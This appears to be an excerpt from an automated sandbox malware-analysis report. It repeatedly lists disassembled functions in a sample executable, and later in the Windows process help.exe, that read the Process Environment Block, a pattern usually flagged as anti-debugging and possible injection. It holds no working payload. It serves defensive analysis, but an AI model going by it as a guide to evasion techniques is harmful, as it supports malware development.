          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F5BA5 mov eax, dword ptr fs:[00000030h]
